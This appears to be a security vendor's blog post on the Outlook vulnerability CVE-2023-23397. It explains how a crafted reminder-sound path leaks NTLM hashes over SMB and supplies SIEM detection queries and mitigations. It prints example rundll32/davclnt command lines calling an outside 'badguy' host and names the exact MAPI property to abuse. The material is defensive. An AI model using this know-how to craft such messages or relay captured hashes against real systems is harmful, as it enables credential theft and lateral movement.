Summary
Discovered by the Ukrainian CERT and attributed to APT28 (aka Fancy Bear or Strontium, the Russian GRU threat actor), CVE-2023-23397 is being actively exploited in targeted attacks against government, transportation, energy, and military sectors in Europe.
With a CVSS rating of 9.8 – due to its elevation of privileges and ease of exploitation – it affects all versions of Outlook for Windows and is particularly serious because it steals credentials before the user has even opened a specially-crafted email.
Attackers can then use the stolen credential to move laterally within the network in order to gather more information and compromise crown-jewel assets.
It’s also interesting that this attack is a variation of pass-the-hash (PtH) which has been around since the late 90s.
This blog post includes detection rules for Splunk, IBM QRadar, and Microsoft Sentinel as well as a detailed technical description of the vulnerability and how it can be exploited.
If you’re currently using the CardinalOps detection posture management platform, these rules are now being delivered to your portals.
As usual, the rules delivered to CardinalOps users are auto-customized to your environment (indexes, naming conventions, etc.). This enables you to quickly review, automatically test, and push them to your SIEM – via its native API – from the CardinalOps platform.
This blog post describes:
- Relevant MITRE techniques for CVE-2023-23397
- Splunk, IBM QRadar, and Sentinel detections for CVE-2023-23397
- How CVE-2023-23397 works
- Technical details for CVE-2023-23397
- How to detect CVE-2023-23397
- Other mitigations for CVE-2023-23397
Relevant MITRE techniques for CVE-2023-23397
Exploitation for Privilege Escalation (T1068)
Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay (T1557.001)
Exploitation for Credential Access (T1212)
Post-Exploitation
OS Credential Dumping: LSASS Memory (T1003.001)
Use Alternate Authentication Material (T1550)
Detections for Microsoft Outlook Vulnerability (CVE-2023-23397)
These rules will alert when a rundll32.exe uses webdav to access a public IP address and in the same time range that an NTLM authentication outbound event is registered with the same public IP address as the destination machine.
Splunk detection rules for Microsoft Outlook Vulnerability (CVE-2023-23397)
index={your_index} sourcetype={your_4688_sourcetype} EventCode=4688 New_Process_Name="*rundll32.exe*" Process_Command_Line="*davclnt.dll*" New_Process_Name="*DavSetCookie*" "davclnt" "rundll32" "DavSetCookie" | rex field=Process_Command_Line "DavSetCookies+(?<IP_Address>d{1,3}.d{1,3}.d{1,3}.d{1,3})" | rex field=Process_Command_Line "DavSetCookies+(?<IP_Address>((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))" | eval isLocal=if((cidrmatch("192.168.0.0/16", IP_Address) OR cidrmatch("10.0.0.0/8", IP_Address) OR cidrmatch("172.16.0.0/12", IP_Address)), "True", "False") | search isLocal="False" AND IP_Address=*
|
[updated]
Splunk correlation search for Microsoft Outlook Vulnerability (CVE-2023-23397)
search (index={your_index} sourcetype={your_NTLM_audit_sourcetype} EventCode=8001) OR (index={your_index} sourcetype={your_4688_sourcetype} EventCode=4688 New_Process_Name="*rundll32.exe*" Process_Command_Line="*davclnt.dll*" New_Process_Name="*DavSetCookie*" "davclnt" "rundll32" "DavSetCookie")
|
[updated]
Note: Time range can be set using the Splunk search console.
IBM QRadar detection rule for Microsoft Outlook Vulnerability (CVE-2023-23397)
|
|
Microsoft Sentinel query for Microsoft Outlook Vulnerability (CVE-2023-23397) which covers both Windows logs and Defender logs
(union isfuzzy=true(DeviceProcessEvents| where ProcessCommandLine has_all ("davclnt.dll", "DavSetCookie") and FileName =~ "rundll32.exe"| extend IPaddress = extract("((\d{1,3})\.(\d{1,3})\.(\d{1,3})\.((\d{1,3})))",1,ProcessCommandLine) | where isnotempty(IPaddress)| project-reorder DeviceName, AccountName, AccountUpn, FolderPath, ProcessCommandLine, InitiatingProcessFolderPath, InitiatingProcessCommandLine, TimeGenerated),(SecurityEvent| where EventID == 4688 and Process =~ "rundll32.exe" and CommandLine has_all ("davclnt.dll", "DavSetCookie")| extend IPaddress = extract("((\d{1,3})\.(\d{1,3})\.(\d{1,3})\.((\d{1,3})))",1,CommandLine) | where isnotempty(IPaddress)| extend DeviceName=Computer| project-reorder DeviceName, NewProcessName, IpAddress, CommandLine, Account, TargetAccount, TimeGenerated )) |
How CVE-2023-23397 works
On March 14th, 2023, A serious vulnerability affecting Microsoft Outlook was patched by Microsoft.
This vulnerability has existed in multiple versions for more than a decade. The affected versions are Outlook for Windows 2013 up to 2019 including the Microsoft 365 (Office 365) versions. Older versions could also be vulnerable but are not tested or supported.
TL;DR – Adversary sending an email with the affected properties will trigger an SMB outbound connection, causing your machine to send out your NTLM hash (your encrypted password along with your username in clear text).
Not to be confused with NT-HASH which is the one used in Pass-the–Hash (PtH) attacks. This NTLM hash contains an encrypted form of your password and will require the adversary to bruteforce this encrypted credential before gaining access to your clear text password.
The time for the bruteforce attack to succeed is dependent on your password length and complexity (can range from seconds to years).
Of course there are other methods that can speed up the guessing process (e.g., Hashcat permutations) so we need to act quickly to prevent and detect this vulnerability exploitation attempts.
Another approach to exploit this vulnerability is to relay the NTLM packets to a target server or workstation.
Think of the IT admin using an unpatched Outlook version causing their machine to send out an NTLM packet. This packet will be captured by the adversary and relayed to another machine on the network, say the HR or Finance department head (or someone in DevOps). Now those machines have accepted the IT admin credentials to login into their machine. Any command can then be executed by the adversary, on behalf of the IT admin.
Getting Creds via NTLMv2 | 0xdf hacks stuff
Of course, for this to occur the adversary needs to have established a foothold on your network, unless you allow outbound and inbound SMB traffic from the internet (we never allow that, right?).
To summarize, we have two outcomes from the exploitation of this Outlook vulnerability: A possible password compromise and access to remote machines.
Technical details for CVE-2023-23397
Let’s dive into more details:
- The Outlook client automatically parses and executes crafted messages containing attributes controlling the MAPI properties allowing to set “reminder notification” sound file location.
- The execution is performed silently, without any indication to the end user.
- The crafted messages can be a shared Outlook task or a calendar invite type of a message.
- The specific MAPI properties are PidLidReminderFileParameter and PidLidReminderOverride.
- Once these properties are set and the PidLidReminderFileParameter is pointing to an adversary’s controlled machine – this is the culprit and that is the reason we are reading this article .
The processing of the path to the reminder sound file location is mostly triggered by Exchange based systems (on-prem and cloud).
Once the Outlook client is able to process the malformed mail item, the outbound SMB packet is sent, without any notification or user interaction.
It seems that even after applying the patch, Microsoft allows the reminder sound file to be loaded by pointing to a hostname. This can be leveraged internally on the network or can be used to access the public IP, if the hosts file is manipulated. Will Dormann on Twitter: “So, all of this wondering about how to send a “rich” calendar invite over SMTP is moot. The actual exploit for CVE-2023-23397 is an IPM.Task item with 0x851F (PidLidReminderFileParameter) set. This is just fine as a TNEF attachment over SMTP. https://t.co/yGSiR4B6wh https://t.co/7GIvb6zGlA” / Twitter
Another nice “feature” of this vulnerability is the ability to trigger legacy capabilities in Windows that if not managed, can leak credentials. For example, by using a non-existent host name in the reminder file path, the adversary can cause LLMNR and NBT-NS broadcast and multicast requests. See https://attack.mitre.org/techniques/T1557/001/ for details.
How to detect CVE-2023-23397
The process command line on the victim’s machine can be identified by the following format:
rundll32.exe C:Windowssystem32davclnt.dll,DavSetCookie [ip address or a domain name] http://[ip address or a domain name]/[path to the a file or a directory]
For example:
rundll32.exe C:Windowssystem32davclnt.dll,DavSetCookie 35.180.139.74 http://35.180.139.74/file/sound.wav
rundll32.exe C:Windowssystem32davclnt.dll,DavSetCookie badguy http://badguy_domain.com/file/sound.wav
The format can also be found to be shorter:
rundll32.exe C:Windowssystem32davclnt.dll,DavSetCookie http://35.180.139.74/file/sound.wav
rundll32.exe C:Windowssystem32davclnt.dll,DavSetCookie http://badguy_domain.com/file/sound.wav
Even though the command line is stating http protocol – the Windows machine will send an SMB packet on port 445.
We need to detect when a DavSetCookie function is accessing a public IP address. This can be normal for a home PC but might be questionable for an enterprise machine. This detection can point out public IP addresses your enterprise clients are using and are trustworthy but anything other than the known good should trigger a deeper investigation.
If we are on the topic of identifying DLL functions we should also remember to have detections to identify the use of a DLL function using the function’s ordinal value. In this case (not tested but typically works), the command could potentially be:
rundll32 c:windowssystem32davclnt.dll,#6 35.180.139.74 http://35.180.139.74/share
For more details, see:
yara-rulz/Outlook_CVE_2023_23397.yara at main · elceef/yara-rulz (github.com)
Another powerful detection source can be leveraged by enabling “Outbound NTLM traffic to remote servers” in the security options. This enables the audit of outbound NTLM authentication traffic so you can identify where your desktops and servers are sending their NTLM hashes.
Example event log:
Other mitigations for CVE-2023-23397
Microsoft suggests to block outbound port 445 and make use of the Protected Users Active Directory group. This is good advice except “Protected Users” is usually not a good fit for the standard user. Test wisely.
We suggest also reviewing your security posture to make sure other vectors are not making it easy for the adversary.
- Ensure your machines are configured to send out only NTLM-v2 and not one of the weaker options. Specifically: configure “Send NTLMv2 responses only. Refuse LM & NTLM.” For more information see https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level
- The fact that we can trigger any outlook user to send his NTLM hash to any destination can affect home users (think the C-level or IT admins) – even if the adversary cracks the NTLM – the adversary still needs to get lucky and find an interface without MFA. So make sure your home users use MFA for any interface they use from their home PC!
- To mitigate the NTLM relay attack vector: ensure SMB server signing is enabled on workstations and servers. Configure workstations to block inbound SMB(port 445) and enable exceptions to specific machines allowed to access workstation over the network using port 445.